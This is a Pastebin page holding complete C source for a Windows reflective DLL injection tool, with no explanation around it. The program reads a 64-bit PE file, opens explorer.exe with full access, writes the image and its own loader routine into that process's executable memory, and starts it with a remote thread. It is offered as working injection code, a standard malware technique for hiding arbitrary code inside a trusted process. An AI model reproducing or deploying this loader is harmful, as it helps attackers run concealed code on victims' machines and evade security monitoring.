API tools faq
paste
Advertisement
shifat627

Reflective DLL Injection

shifat627
Dec 10th, 2018
4,012
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C (WinAPI) 6.45 KB | None | 0 0
raw download clone embed print report
  1. #include<stdio.h>
  2. #include<windows.h>
  3. #include<tlhelp32.h>
  4. #include<string.h>
  5.  
  6.  
  7. typedef struct _PE_INFO
  8. {
  9.     LPVOID base;
  10.     BOOL reloc; //For If base relocation is needed
  11.     LPVOID Get_Proc; //Address OF GetProcAddress()
  12.     LPVOID Load_DLL; //Address OF LoadLibraryA()
  13. }PE_INFO , * LPE_INFO;
  14.  
  15. LPVOID Read_in_Memory(char * FileName)
  16. {
  17.     HANDLE f,h;
  18.     LPVOID mem;
  19.    
  20.     if((f=CreateFileA(FileName,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL))==INVALID_HANDLE_VALUE)
  21.     return NULL;
  22.    
  23.     if((h=CreateFileMappingA(f,NULL,PAGE_READONLY,0,0,NULL))==NULL)
  24.     return NULL;
  25.    
  26.     if((mem=MapViewOfFile(h,FILE_MAP_READ,0,0,0))==NULL)
  27.     return NULL;
  28.     else
  29.     return mem;
  30.    
  31. }
  32.  
  33. HANDLE Find_Process(char * process_name)
  34. {
  35.     HANDLE snap,proc;
  36.     PROCESSENTRY32 ps;
  37.     BOOL found=0;
  38.    
  39.     ps.dwSize=sizeof(ps);
  40.    
  41.     if((snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0) )==INVALID_HANDLE_VALUE)
  42.     return NULL;
  43.    
  44.     if(!Process32First(snap,&ps))
  45.     return NULL;
  46.    
  47.     do
  48.     {
  49.         if(!strcmp(process_name,ps.szExeFile))
  50.         {
  51.             found=1;
  52.             break;
  53.         }
  54.     }while(Process32Next(snap,&ps));
  55.    
  56.     CloseHandle(snap);
  57.     if(!found)
  58.     return NULL;
  59.    
  60.     if((proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID))==NULL)
  61.     {
  62.         return NULL;
  63.     }
  64.     else
  65.     return proc;
  66. }
  67.  
  68.  
  69. void AdjustPE(LPE_INFO pe)
  70. {
  71.     PIMAGE_DOS_HEADER dos;
  72.     PIMAGE_NT_HEADERS nt;
  73.     LPVOID base;
  74.     PIMAGE_IMPORT_DESCRIPTOR import;
  75.     PIMAGE_THUNK_DATA Othunk,Fthunk;
  76.     PIMAGE_BASE_RELOCATION reloc;
  77.     PIMAGE_TLS_DIRECTORY tls;
  78.     PIMAGE_TLS_CALLBACK * CallBack;
  79.     ULONGLONG * p,delta;
  80.    
  81.     BOOL (*DLL_Entry)(LPVOID , DWORD , LPVOID );
  82.     LPVOID (*Load_DLL)(LPSTR );
  83.     LPVOID (*Get_Proc)(LPVOID , LPSTR );
  84.    
  85.     base=pe->base;
  86.     Load_DLL=pe->Load_DLL;
  87.     Get_Proc=pe->Get_Proc;
  88.    
  89.     dos=(PIMAGE_DOS_HEADER)base;
  90.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  91.    
  92.     DLL_Entry=base+nt->OptionalHeader.AddressOfEntryPoint;
  93.    
  94.     if(!pe->reloc)
  95.     goto Load_Import;
  96.    
  97.     Base_Relocation:
  98.         if(nt->OptionalHeader.DataDirectory[5].VirtualAddress==0) //No Relocation Table Found
  99.         goto Load_Import;
  100.         delta=(ULONGLONG)base-nt->OptionalHeader.ImageBase;
  101.         reloc=(PIMAGE_BASE_RELOCATION)(base+nt->OptionalHeader.DataDirectory[5].VirtualAddress);
  102.         while(reloc->VirtualAddress)
  103.         {
  104.             LPVOID dest=base+reloc->VirtualAddress;
  105.             int nEntry=(reloc->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2;
  106.             PWORD data=(PWORD)((LPVOID)reloc+sizeof(IMAGE_BASE_RELOCATION));
  107.             int i;
  108.             for(i=0;i<nEntry;i++,data++)
  109.             {
  110.                 if(((*data)>>12)==10)
  111.                 {
  112.                     p=(PULONGLONG)(dest+((*data)&0xfff));
  113.                     *p+=delta;
  114.                 }
  115.             }
  116.            
  117.             reloc=(PIMAGE_BASE_RELOCATION)((LPVOID)reloc+reloc->SizeOfBlock);
  118.            
  119.         }
  120.         //End OF base Relocation
  121.        
  122.     Load_Import:
  123.         if(nt->OptionalHeader.DataDirectory[1].VirtualAddress==0)
  124.         goto TLS_CallBack;
  125.         import=(PIMAGE_IMPORT_DESCRIPTOR)(base+nt->OptionalHeader.DataDirectory[1].VirtualAddress);
  126.         while(import->Name)
  127.         {
  128.             LPVOID dll=(*Load_DLL)(base+import->Name);
  129.             Othunk=(PIMAGE_THUNK_DATA)(base+import->OriginalFirstThunk);
  130.             Fthunk=(PIMAGE_THUNK_DATA)(base+import->FirstThunk);
  131.            
  132.             if(!import->OriginalFirstThunk)
  133.             Othunk=Fthunk;
  134.            
  135.             while(Othunk->u1.AddressOfData)
  136.             {
  137.                 if(Othunk->u1.Ordinal & IMAGE_ORDINAL_FLAG)
  138.                 {
  139.                     *(ULONGLONG *)Fthunk=(ULONGLONG)(*Get_Proc)(dll,(LPSTR)IMAGE_ORDINAL(Othunk->u1.Ordinal));
  140.                 }
  141.                 else
  142.                 {
  143.                     PIMAGE_IMPORT_BY_NAME fnm=(PIMAGE_IMPORT_BY_NAME)(base+Othunk->u1.AddressOfData);
  144.                     *(PULONGLONG)Fthunk=(ULONGLONG)(*Get_Proc)(dll,fnm->Name);
  145.                 }
  146.                 Othunk++;
  147.                 Fthunk++;
  148.             }
  149.             import++;
  150.         }
  151.    
  152.    
  153.     TLS_CallBack:
  154.         if(nt->OptionalHeader.DataDirectory[9].VirtualAddress==0)
  155.         goto Execute_Entry;
  156.         tls=(PIMAGE_TLS_DIRECTORY)(base+nt->OptionalHeader.DataDirectory[9].VirtualAddress);
  157.         if(tls->AddressOfCallBacks==0)
  158.         goto Execute_Entry;
  159.        
  160.         CallBack=(PIMAGE_TLS_CALLBACK *)(tls->AddressOfCallBacks);
  161.         while(*CallBack)
  162.         {
  163.             (*CallBack)(base,DLL_PROCESS_ATTACH,NULL);
  164.             CallBack++;
  165.         }
  166.    
  167.    
  168.     Execute_Entry: 
  169.         (*DLL_Entry)(base,DLL_PROCESS_ATTACH,NULL);
  170.    
  171. }
  172.  
  173.  
  174. int main(int i,char **arg)
  175. {
  176.     if(i!=2)
  177.     {
  178.         printf("Usage %s <pe>",*arg);
  179.         return 0;
  180.     }
  181.    
  182.     HANDLE proc;
  183.     LPVOID base,Rbase,Adj;
  184.     PIMAGE_DOS_HEADER dos;
  185.     PIMAGE_SECTION_HEADER sec;
  186.     PIMAGE_NT_HEADERS nt;
  187.     DWORD Func_Size;
  188.     PE_INFO pe;
  189.    
  190.     printf("[+]Opening File...\n");
  191.    
  192.     if((base=Read_in_Memory(*(arg+1)))==NULL)
  193.     {
  194.         printf("[-]File I/O Error");
  195.         return 0;
  196.     }
  197.    
  198.     dos=(PIMAGE_DOS_HEADER)base;
  199.    
  200.     if(dos->e_magic!=23117)
  201.     {
  202.         printf("[-]Invalid File");
  203.         return 0;
  204.     }
  205.    
  206.     nt=(PIMAGE_NT_HEADERS)(base+dos->e_lfanew);
  207.     sec=(PIMAGE_SECTION_HEADER)((LPVOID)nt+24+nt->FileHeader.SizeOfOptionalHeader);
  208.    
  209.     if(nt->OptionalHeader.Magic!=IMAGE_NT_OPTIONAL_HDR64_MAGIC)
  210.     {
  211.         printf("[-]This is not 64 bit pe");
  212.         return 0;
  213.     }
  214.    
  215.     printf("\n[+]Open Process.....");
  216.    
  217.     if((proc=Find_Process("explorer.exe"))==NULL)
  218.     {
  219.         printf("[-]Failed To Open Process");
  220.         return 0;
  221.     }
  222.    
  223.     printf("[+]Allocating Memory Into Remote Process");
  224.    
  225.     pe.reloc=0;
  226.    
  227.     if((Rbase=VirtualAllocEx(proc,(LPVOID)nt->OptionalHeader.ImageBase,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  228.     {
  229.         printf("\n[!]Failed To Allocate Memory AT %#p\n[!]Trying Alternative\n",nt->OptionalHeader.ImageBase);
  230.         pe.reloc=1;
  231.         if((Rbase=VirtualAllocEx(proc,NULL,nt->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  232.         {
  233.             printf("[-]Failed To Allocate Memory Into Remote Process");
  234.             return 0;
  235.         }
  236.     }
  237.    
  238.     printf("\n[+]Copying Headers");
  239.     WriteProcessMemory(proc,Rbase,base,nt->OptionalHeader.SizeOfHeaders,NULL);
  240.     printf("\n[+]Copying Sections...");
  241.     for(i=0;i<nt->FileHeader.NumberOfSections;i++)
  242.     {
  243.         WriteProcessMemory(proc,Rbase+sec->VirtualAddress,base+sec->PointerToRawData,sec->SizeOfRawData,NULL);
  244.         sec++;
  245.     }
  246.    
  247.     Func_Size=(DWORD)((ULONGLONG)main-(ULONGLONG)AdjustPE);
  248.     pe.base=Rbase;
  249.     pe.Get_Proc=GetProcAddress;
  250.     pe.Load_DLL=LoadLibraryA;
  251.    
  252.     if((Adj=VirtualAllocEx(proc,NULL,Func_Size+sizeof(pe),MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
  253.     {
  254.         printf("\n[-]Failed To Allocate Memory for PE adjusting");
  255.         VirtualFreeEx(proc,Rbase,0,MEM_RELEASE);
  256.         return 0;
  257.     }
  258.    
  259.     WriteProcessMemory(proc,Adj,&pe,sizeof(pe),NULL);
  260.     WriteProcessMemory(proc,Adj+sizeof(pe),AdjustPE,Func_Size,NULL);
  261.     if(!CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)(Adj+sizeof(pe)),Adj,0,NULL))
  262.     printf("\n[-]Failed TO Adjust PE");
  263.     else
  264.     printf("\n[+]Adjusting PE And Executing....");
  265.    
  266.     return 0;
  267.    
  268. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!